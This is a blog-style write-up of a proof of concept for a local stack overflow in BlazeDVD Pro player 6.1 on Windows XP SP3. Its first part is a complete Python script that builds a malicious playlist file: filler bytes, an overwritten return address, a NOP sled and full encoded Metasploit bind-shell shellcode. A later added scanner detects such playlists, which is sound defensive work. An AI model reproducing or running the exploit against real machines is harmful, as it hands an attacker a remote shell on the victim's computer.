exploit - simple stack overflow - BlazeDVD Pro player 6.1
2015-06-19 21:25
PoC: BlazeDVD Pro player 6.1 local stack-based buffer overflow
PuN1sh3r showed how to exploit BlazeDVD Pro player 6.1 on Windows 2003 Server SP1 (EN).
Now I'll show a PoC on Windows XP SP3.
How to exploit a simple stack overflow?
1. crash the program
2. find EIP
3. filter out bad characters
4. create the shellcode
5. finish the exploit code
```python
#!/usr/bin/env python2
# -*- coding: utf8 -*-
# Python 2 script: str is a byte string, so the payload is written verbatim.
with open("exploit.plf", "w") as f:
    junk = "A" * 260                  # filler up to the saved return address
    eip = "\x7B\x46\x86\x7C"          # 7C86467B (little-endian)
    # eip = "\xD8\x9E\x24\x77"        # 0x77249ed8 (alternative address)
    # badChars: 0x00, 0x0A, 0x1A
    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    # EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    buf = "\x90" * 32                 # NOP sled in front of the shellcode
    buf += "\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x53\xbf\xe9"
    buf += "\xe6\x11\xd6\x31\x78\x17\x83\xe8\xfc\x03\x91\xf5\xf3"
    buf += "\x23\x9d\x12\x71\xcb\x5d\xe3\x16\x45\xb8\xd2\x16\x31"
    buf += "\xc9\x45\xa7\x31\x9f\x69\x4c\x17\x0b\xf9\x20\xb0\x3c"
    buf += "\x4a\x8e\xe6\x73\x4b\xa3\xdb\x12\xcf\xbe\x0f\xf4\xee"
    buf += "\x70\x42\xf5\x37\x6c\xaf\xa7\xe0\xfa\x02\x57\x84\xb7"
    buf += "\x9e\xdc\xd6\x56\xa7\x01\xae\x59\x86\x94\xa4\x03\x08"
    buf += "\x17\x68\x38\x01\x0f\x6d\x05\xdb\xa4\x45\xf1\xda\x6c"
    buf += "\x94\xfa\x71\x51\x18\x09\x8b\x96\x9f\xf2\xfe\xee\xe3"
    buf += "\x8f\xf8\x35\x99\x4b\x8c\xad\x39\x1f\x36\x09\xbb\xcc"
    buf += "\xa1\xda\xb7\xb9\xa6\x84\xdb\x3c\x6a\xbf\xe0\xb5\x8d"
    buf += "\x6f\x61\x8d\xa9\xab\x29\x55\xd3\xea\x97\x38\xec\xec"
    buf += "\x77\xe4\x48\x67\x95\xf1\xe0\x2a\xf2\x36\xc9\xd4\x02"
    buf += "\x51\x5a\xa7\x30\xfe\xf0\x2f\x79\x77\xdf\xa8\x7e\xa2"
    buf += "\xa7\x26\x81\x4d\xd8\x6f\x46\x19\x88\x07\x6f\x22\x43"
    buf += "\xd7\x90\xf7\xfe\xdf\x37\xa8\x1c\x22\x87\x18\xa1\x8c"
    buf += "\x60\x73\x2e\xf3\x91\x7c\xe4\x9c\x3a\x81\x07\xb3\xe6"
    buf += "\x0c\xe1\xd9\x06\x59\xb9\x75\xe5\xbe\x72\xe2\x16\x95"
    buf += "\x2a\x84\x5f\xff\xed\xab\x5f\xd5\x59\x3b\xd4\x3a\x5e"
    buf += "\x5a\xeb\x16\xf6\x0b\x7c\xec\x97\x7e\x1c\xf1\xbd\xe8"
    buf += "\xbd\x60\x5a\xe8\xc8\x98\xf5\xbf\x9d\x6f\x0c\x55\x30"
    buf += "\xc9\xa6\x4b\xc9\x8f\x81\xcf\x16\x6c\x0f\xce\xdb\xc8"
    buf += "\x2b\xc0\x25\xd0\x77\xb4\xf9\x87\x21\x62\xbc\x71\x80"
    buf += "\xdc\x16\x2d\x4a\x88\xef\x1d\x4d\xce\xef\x4b\x3b\x2e"
    buf += "\x41\x22\x7a\x51\x6e\xa2\x8a\x2a\x92\x52\x74\xe1\x16"
    buf += "\x62\x3f\xab\x3f\xeb\xe6\x3e\x02\x76\x19\x95\x41\x8f"
    buf += "\x9a\x1f\x3a\x74\x82\x6a\x3f\x30\x04\x87\x4d\x29\xe1"
    buf += "\xa7\xe2\x4a\x20"
    # pad the whole payload out to 2000 bytes
    nops = "\x90" * (2000 - len(junk) - len(eip) - len(buf))
    payload = junk + eip + buf + nops
    f.write(payload)
```
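The payload above has a recognisable shape from the defender's side: one playlist entry of 2000 bytes where a real media path is a few dozen, a run of 0x90 NOPs, and a large share of non-printable bytes, all kept free of 0x00/0x0A/0x1A so the string copy does not stop early. As an added example (not part of the original post or PuN1sh3r's work), here is a Python 3 scanner that applies those heuristics to a playlist file before it is opened. The thresholds MAX_ENTRY_LEN and NON_PRINTABLE_RATIO are assumed policy values, not vendor limits, and the sample playlist is constructed: its crafted line reuses the layout above (260 bytes of junk, the 4-byte address, a 32-byte NOP sled) but carries opaque filler bytes instead of shellcode.

```python
#!/usr/bin/env python3
"""Heuristic scanner for playlist files that carry stack-overflow payloads.

Added example for this write-up, not code from the original post. It reads a
.plf-style playlist (one entry per line) and flags entries that look like the
2000-byte payload built above.
"""
import re

MAX_ENTRY_LEN = 512                 # assumed policy limit; real paths are far shorter
NOP_SLED = re.compile(rb"\x90{16,}")  # a run of at least 16 x86 NOPs
NON_PRINTABLE_RATIO = 0.25          # assumed: crafted data is mostly opaque bytes
BAD_CHARS = {0x00, 0x0A, 0x1A}      # bytes the write-up says the payload must avoid


def scan_entry(entry):
    """Return a list of findings (strings) for one playlist entry (bytes)."""
    findings = []
    if not entry:
        return findings
    if len(entry) > MAX_ENTRY_LEN:
        findings.append("oversized entry (%d bytes)" % len(entry))
    if NOP_SLED.search(entry):
        findings.append("NOP sled (0x90 run)")
    opaque = sum(1 for b in entry if b < 0x20 or b > 0x7E)
    if opaque / len(entry) > NON_PRINTABLE_RATIO:
        findings.append("mostly non-printable bytes (%d/%d)" % (opaque, len(entry)))
    return findings


def scan_playlist(data):
    """Scan raw playlist bytes; return {line_number: [findings]} for flagged lines.

    Entries are split on 0x0A. That is also why the exploit keeps 0x0A out of
    its payload: a newline would terminate the copied string before the
    return address is reached.
    """
    report = {}
    for lineno, entry in enumerate(data.split(b"\n"), start=1):
        entry = entry.rstrip(b"\r")
        hits = scan_entry(entry)
        if hits:
            report[lineno] = hits
    return report


def build_sample_playlist():
    """Constructed input: two ordinary entries plus one synthetic crafted line.

    The crafted line mirrors the layout of the payload above (junk, 4-byte
    address, NOP sled) but uses a fixed byte cycle as filler; it is not
    shellcode and does nothing if loaded.
    """
    benign = b"C:\\Videos\\holiday.avi\nD:\\Movies\\trailer.mpg\n"
    junk = b"A" * 260
    fake_ret = b"\x7b\x46\x86\x7c"           # little-endian 7C86467B from the write-up
    sled = b"\x90" * 32
    # filler excludes the bad chars, exactly as a real payload would have to
    filler = bytes(b for b in range(256) if b not in BAD_CHARS) * 8
    crafted = (junk + fake_ret + sled + filler)[:2000]
    return benign + crafted + b"\n"


if __name__ == "__main__":
    for lineno, hits in sorted(scan_playlist(build_sample_playlist()).items()):
        print("line %d: %s" % (lineno, "; ".join(hits)))
```

Run it as-is to see only the third line reported with all three findings; the two ordinary paths pass clean. Splitting on 0x0A before measuring mirrors what the vulnerable string copy sees, so the length check is applied to the same bytes that would land on the stack.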